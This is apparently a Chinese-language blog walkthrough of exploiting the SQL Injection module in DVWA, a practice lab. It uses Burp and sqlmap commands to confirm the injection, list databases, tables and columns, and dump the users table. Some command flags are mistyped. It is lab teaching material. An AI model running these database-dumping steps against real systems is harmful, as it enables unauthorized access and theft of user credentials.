我们直接看到dvwa的SQL Injection模块
我们已经知道这个题存在SQL注入,那么直接上sqlmap进行测试
![](https://img-blog.csdnimg.cn/img_convert/07b46071b4a7d8a7e0b9095aef791a85.png)
先使用burp抓取一个提交查询的数据包。
![](https://img-blog.csdnimg.cn/img_convert/e02522b5f880d6eac3af7c760736aac7.png)
保存为123.txt。然后使用sqlmap进行注入:
命令如下sqlmap -r 123.txt —-data=id --batch (-r参数是指定一个文件―data是指定我们要进行sql注入的参数,--batch意思是选择默认参数)
结果如下图所示:已经确定这个注入点。
![](https://img-blog.csdnimg.cn/img_convert/5251258a77654052297b5f7a9d64b19f.png)
使用下面命令列出数据库的库名
sqlmap -r 123.txt —-data=id --batch - dbs
![](https://img-blog.csdnimg.cn/img_convert/0ae89ca9418f8ae4f7995fe1d7f39e69.png)
存在5个数据库,我们选择dvwa数据库,使用下面的命令列出dvwa数据库中的表名
sqlmap -r 123.txt —-data=id --batch -D dvwa —-tables
![](https://img-blog.csdnimg.cn/img_convert/a0523aca3a625555ebac1478683982a2.png)
获得user表,再通过下面命令列出dvwa数据库下,users表中的列名sqlmap -r 123.txt --data=id --batch -D dvwa -T users -columns
![](https://img-blog.csdnimg.cn/img_convert/8961d50041a712e0c53251646995d03d.png)
使用sqlmap -r 123.txt --data=id --batch -D dvwa -T users -dump语句能查看所有users表中内容
![](https://img-blog.csdnimg.cn/img_convert/6905ff67927c13a20e3ffa16c9ec79c7.png)